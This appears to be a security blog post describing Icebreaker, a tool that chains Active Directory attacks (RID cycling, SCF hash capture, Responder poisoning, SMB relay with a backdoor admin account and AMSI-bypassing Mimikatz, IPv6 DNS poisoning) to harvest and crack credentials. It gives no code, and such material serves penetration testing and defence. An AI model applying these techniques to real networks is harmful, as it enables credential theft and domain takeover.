Icebreaker Automates network attacks against Active Directory to deliver you plaintext credentials when you’re inside the network but outside of the Active Directory environment. Cyber security researchers explain that Icebreaker perform 5 different network attacks for plaintext credentials as well as hashes. Autocracks hashes found with JohnTheRipper and a custom 1 million password wordlist specifically for Active Directory passwords.
RID cycling
Uses Nmap to find NULL SMB sessions
Performs asynchronous RID cycling to find valid usernames
Performs a 2 password reverse bruteforce of found usernames
Passwords tested: P@ssw0rd and <season><year>, e.g., Winter2018
SCF file upload
Uses Nmap to find anonymously writeable shares on the network
Writes an SCF file to the share with a file icon that points to your device
When a user opens the share in Explorer their hash is sent to you
Autocracks the hash with john and top 10 million password list
LLMNR/NBTNS/mDNS
Uses Responder.py to poison the layer 2 network and capture user hashes
Autocracks the hash with john and top 10 million password list
SMB relay
Uses ntlmrelay.py and Responder.py to relay SMB hashes
After a successful relay it will do the following on the victim machine:
Add an administrative user – icebreaker:P@ssword123456
Run an obfuscated and AMSI bypassing version of Mimikatz and parse the output for hashes and passwords
IPv6 DNS poison
Uses mitm6 and ntlmrelayx.py to poison IPv6 DNS and capture user and machine hashes
Creates fake WPAD server with authentication
This can easily cause network connectivity issues for users so data security specialists recommend use sparingly
How It Works
It will perform the above 5 network attacks in order. RID cycling and SCF file uploads usually go fast, then it lingers on attack 3, Responder.py, for 10 min by default. After that amount of time or the user-specified amount of time has passed, it will move on to the final two attacks which are run in parallel and indefinitely.
Once performing RID cycling and an asynchronous bruteforce it moves on to upload SCF files to anonymously writeable shares. According to cyber security experts, if an SCF file was successfully uploaded and a user visits that file share in Explorer the user’s hash will be captured and attempted to be cracked by icebreaker. If the hash is captured while attack 4, SMB relay, is running, the hash will be relayed for potential command execution. Relaying a hash to another machine allows us to impersonate the user whose hash we captured and if that user has administrative rights to the machine we relayed the hash to then we can perform command execution.
When ntlmrelayx relays a captured hash it will run a base64-encoded PowerShell command that first adds an administrative user (icebreaker:P@ssword123456) then runs an obfuscated and AMSI-bypassing version of Mimikatz. This mimikatz output is parsed and delivered to the user in the standard output as well as in the found-passwords.txt file if any plaintext passwords or NTLM hashes are found.
If icebreaker is run with the –auto flag, then upon reaching attack 4 icebreaker will run Empire and DeathStar in xterm windows. With this option, instead of running mimikatz on the remote box that we relayed the hash to, icebreaker add an administrative user and right after that it’ll run Empire’s PowerShell launcher code to get an agent on the remote machine. DeathStar will use this agent to automate the process of achieving domain admin. The Empire and DeathStar xterm windows will not close when you exit icebreaker.
Password cracking is done with JohnTheRipper and a custom wordlist. The wordlist was pruned and includes no passwords with: all lowercase, all uppercase, all symbols, less than 7 characters, more than 32 characters. These rules conform to the default Active Directory password requirements and brought the list from 20 million to just over 1 million which according to data security professionals makes password cracking extremely fast.
IPv6 DNS poisoning: this attack is prone to causing issues on the network. It causes certificate errors on client machines in the browser. It’ll also slow the network down. According to data security researchers, Windows AD environments are vulnerable by default.
Working as a cyber security solutions architect, Alisa focuses on application and network security. Before joining us she held a cyber security researcher positions within a variety of cyber security start-ups. She also experience in different industry domains like finance, healthcare and consumer products.